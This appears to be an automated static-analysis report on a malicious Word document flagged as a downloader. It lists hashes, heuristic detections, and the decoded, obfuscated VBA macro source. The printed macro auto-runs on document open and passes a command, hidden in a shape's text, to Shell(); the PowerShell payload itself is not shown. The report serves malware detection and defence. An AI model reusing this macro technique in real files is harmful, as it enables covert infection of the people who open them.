Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 72a85880fe96b7c8…

MALICIOUS

Office (OLE)

85.4 KB Created: 2018-11-13 21:39:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: d8e5af1547f6cade9f8c294766e129b6 SHA-1: 5f0be4f9f413ace4c1dc7173e3584dc708c96fc2 SHA-256: 72a85880fe96b7c8fe236d4c6cb288a34d48d5b64996905cbed56b2f647c49e6
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Valyria-6769640-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6769640-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
        End If
    iBhKoI = Shell(mqlsPI + ZHjzL + QzQLs, oXvSNWdI)
       If (wEMNuff <> 0 Or vKHrGfLtQ) Then
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_open()
       If (auIRQQ <> 0 Or aOWazKfw) Then
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7694 bytes
SHA-256: 7bf97758d6844cc4086324a2982b7b41f0fd337e7bb2d3f3a8ec5b33ff1be7fc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
83 of 154 identifiers look randomly generated (e.g. 'IMuCUMWmGC'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "IMuCUMWmGC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lwZCufGCP()
Const oXvSNWdI = 224789120 - 224789120
   If (fHTtZ <> 0 Or vmRlIsaSH) Then
        vmRlIsaSH = True
        SSGLDOmUz = SSGLDOmUz & YGAKCB = 467282665 * 347386948
        If (fHTtZ = 1) Then
            SSGLDOmUz = SSGLDOmUz & FcNcin = Vlvwu - 325908429
            SSGLDOmUz = SSGLDOmUz & JPiGC = GKwRU / wpYpmH
            SSGLDOmUz = SSGLDOmUz & GzVptR = 126208497 / 45039723
        Else
            SSGLDOmUz = SSGLDOmUz & irqSSp = 235024981 - paJbtH
            SSGLDOmUz = SSGLDOmUz & ujGLti = 137534374 - zqfwoN
            SSGLDOmUz = SSGLDOmUz & KoZkoS = PUjwiY - 120808974
        End If
    End If
   If (GpYVq <> 0 Or vuAprmnw) Then
        vuAprmnw = True
        TdsQiTrs = TdsQiTrs & BiUshq = 284512062 - 29939391
        If (GpYVq = 1) Then
            TdsQiTrs = TdsQiTrs & SaUpZc = nkfok + 533672341
            TdsQiTrs = TdsQiTrs & wJnPF = ujvQlO * lTHRDM
            TdsQiTrs = TdsQiTrs & vZLTI = rPEjw + GcqsuE
        Else
            TdsQiTrs = TdsQiTrs & owNXKi = 283011076 / cqufTc
            TdsQiTrs = TdsQiTrs & bUXwUG = BfbORH + VvbNM
            TdsQiTrs = TdsQiTrs & YMiCA = 232234157 * hlBVZN
        End If
    End If
mqlsPI = Shapes(NszoLN + AnwhAKT + 1 + milkrFp + PaNOGfh).TextFrame.ContainingRange + FoYcwZ + BTvOJMT
   If (ciiWnKWj <> 0 Or nQlhTzZrN) Then
        nQlhTzZrN = True
        DJhLpGDVW = DJhLpGDVW & FOuLU = 529027297 / DwwSi
        If (ciiWnKWj = 1) Then
            DJhLpGDVW = DJhLpGDVW & wwmiz = AvpSw / 403899955
            DJhLpGDVW = DJhLpGDVW & zcuSpQ = 462622714 + 416953551
            DJhLpGDVW = DJhLpGDVW & oAPsZW = 274086552 / MQwdv
        Else
            DJhLpGDVW = DJhLpGDVW & MBMjZL = jVabn / 100433503
            DJhLpGDVW = DJhLpGDVW & RMrIl = 520799977 / 4277701
            DJhLpGDVW = DJhLpGDVW & fipBh = 109187285 * 524512413
        End If
    End If
iBhKoI = Shell(mqlsPI + ZHjzL + QzQLs, oXvSNWdI)
   If (wEMNuff <> 0 Or vKHrGfLtQ) Then
        vKHrGfLtQ = True
        ZEvzzCJ = ZEvzzCJ & wWuBMo = 136441263 + 333651452
        If (wEMNuff = 1) Then
            ZEvzzCJ = ZEvzzCJ & FAaNr = 282855970 - cuCaWH
            ZEvzzCJ = ZEvzzCJ & EiGdtU = kawHJ * PjIEt
            ZEvzzCJ = ZEvzzCJ & SnAikj = twJtZ + vZaNQR
        Else
            ZEvzzCJ = ZEvzzCJ & rPTiC = DnPtm / jXowDD
            ZEvzzCJ = ZEvzzCJ & wUaca = 517687982 * YfOdpV
            ZEvzzCJ = ZEvzzCJ & nlHDTV = 211598828 + 315062024
        End If
    End If
   If (zSZoF <> 0 Or FNVIK) Then
        FNVIK = True
        PMWzfdM = PMWzfdM & iclbP = 399999250 * 395708406
        If (zSZoF = 1) Then
            PMWzfdM = PMWzfdM & MAPbw = dXiWcs / 43176053
            PMWzfdM = PMWzfdM & DCMlb = pGquzk - 162331629
            PMWzfdM = PMWzfdM & jaaWhw = nzEzt * 154383572
        Else
            PMWzfdM = PMWzfdM & Sssiz = mcJBV - JmZLVG
            PMWzfdM = PMWzfdM & qOMDw = 388283978 - piTMF
            PMWzfdM = PMWzfdM & OsQWwN = uawGW * 325567165
        End If
    End If
   If (jXMzc <> 0 Or wfCwGpw) Then
        wfCwGpw = True
        KtTPDD = KtTPDD & wtQdz = 271725045 / 83614485
        If (jXMzc = 1) Then
            KtTPDD = KtTPDD & MrsIp = 306560923 / rfSSUk
            KtTPDD = KtTPDD & zipTPG = 471489280 - 386022285
            KtTPDD = KtTPDD & ujhiq = Uzhdw / 150380567
        Else
            KtTPDD = KtTPDD & fSmoJ = 326048488 + 314223035
            KtTPDD = KtTPDD & RLFmsb = fZEYIZ + WhPcK
            KtTPDD = KtTPDD & RWJtw = 379478191 * 519240723
        End If
    End If
   If (cliDXv <> 0 Or DGcWKvUoQ) Then
        DGcWKvUoQ = True
        twdnpJZX = twdnpJZX & KvQlch = EUiwZD + 325012030
        If (cliDXv = 1) Then
            twdnpJZX = twdnpJZX & jbIASL = 243762865 + 97847169
            twdnpJZX = twdnpJZX & TzqQaX = dnbFfc * znUApj
            twdnpJZX = twdnpJZX & zFUNqN = LhIGLw - zaVCJc
        Else
            twdnpJZX = twdnpJZX & hHqtaA = onAdbF - 218359720
            twdnpJZX = twdnpJZX & sVDkK = 480985890 * 271183468
            twdnpJZX = twdnpJZX & RGSwU = 450873287 - tzMzwf
        End If
    End If
End Function
Private Sub Document_open()
   If (auIRQQ <> 0 Or aOWazKfw) Then
        aOWazKfw = True
        cEUajiz = cEUajiz & qnAEMF = 327800203 * ocbWLV
        If (auIRQQ = 1) Then
            cEUajiz = cEUajiz & AjWpMa = GULAJY * jGhwu
            cEUajiz = cEUajiz & acPdN = llXjJ + 519343112
            cEUajiz = cEUajiz & ApDoEu = 515032081 - 312413582
        Else
            cEUajiz = cEUajiz & YtkTp = CjdFV * 296778186
            cEUajiz = cEUajiz & ZRAMXQ = bDoIik + QIjEu
            cEUajiz = cEUajiz & mfVcq = 366197253 / 218370920
        End If
    End If
   If (wfFNYlSk <> 0 Or HzijLFBww) Then
        HzijLFBww = True
        UTjAOwL = UTjAOwL & KBZnd = 319061158 + XIdwv
        If (wfFNYlSk = 1) Then
            UTjAOwL = UTjAOwL & BDohv = 200065476 - 491863933
            UTjAOwL = UTjAOwL & oPiTz = hhVNQf / RNjHjS
            UTjAOwL = UTjAOwL & TTJDc = 456738904 / 535880450
        Else
            UTjAOwL = UTjAOwL & BjVRf = EzIwTr - sGwtJ
            UTjAOwL = UTjAOwL & zGiERw = 396145209 + 182634095
            UTjAOwL = UTjAOwL & PazUF = 473031451 + qzjALE
        End If
    End If
   If (zdTPNO <> 0 Or tIcksYF) Then
        tIcksYF = True
        SSzbI = SSzbI & osZvGj = oCwUoA - rjUznu
        If (zdTPNO = 1) Then
            SSzbI = SSzbI & KVjlU = HjfjjI + IltTGi
            SSzbI = SSzbI & EFiPEX = MizBn - 267123905
            SSzbI = SSzbI & NiWpK = 45991252 / pTHWRo
        Else
            SSzbI = SSzbI & ImGqAq = zIEqU / 309682322
            SSzbI = SSzbI & wjvwii = 125639746 - 364226225
            SSzbI = SSzbI & uidODJ = 434525500 / 4375307
        End If
    End If
   If (bwjNbYPY <> 0 Or szKiO) Then
        szKiO = True
        ajVco = ajVco & YJomv = 410176811 + 224657245
        If (bwjNbYPY = 1) Then
            ajVco = ajVco & iIrmqW = YMUdt * 475746604
            ajVco = ajVco & hKoGk = 457674572 - 463280713
            ajVco = ajVco & NjZDi = 396580154 + 56394190
        Else
            ajVco = ajVco & hfhCnv = 443827369 - fmlQOF
            ajVco = ajVco & oJqsG = cTHvk + DShEE
            ajVco = ajVco & IEJqn = YZCOW * uZBifE
        End If
    End If
lwZCufGCP
   If (LcIjCpj <> 0 Or AcfYLT) Then
        AcfYLT = True
        jkBinn = jkBinn & wZKSHu = 80734416 + 355806204
        If (LcIjCpj = 1) Then
            jkBinn = jkBinn & XWOpTQ = jcjvSz + HYWrT
            jkBinn = jkBinn & lsobn = QfjWjh / 15906184
            jkBinn = jkBinn & XcGRjr = 159107910 * nDIVm
        Else
            jkBinn = jkBinn & pmpAo = odJfhn * 113519003
            jkBinn = jkBinn & jzvzG = 529810725 + NcZiAH
            jkBinn = jkBinn & zPdijS = Szipih + sLOzY
        End If
    End If
   If (LDsGCYYs <> 0 Or HptBbZ) Then
        HptBbZ = True
        bvOwj = bvOwj & VFOYoV = LhbdF * LkchuP
        If (LDsGCYYs = 1) Then
            bvOwj = bvOwj & hWApjj = KnBJi + 303723400
            bvOwj = bvOwj & cinrdj = 182673655 / aEaNP
            bvOwj = bvOwj & nNQwNU = JBwEZs / BGYjS
        Else
            bvOwj = bvOwj & HLdzlE = Lzcwn + jtGuo
            bvOwj = bvOwj & ovoaji = lbCTj * vQobkT
            bvOwj = bvOwj & JKYJZ = RAIOv - 270124549
        End If
    End If
End Sub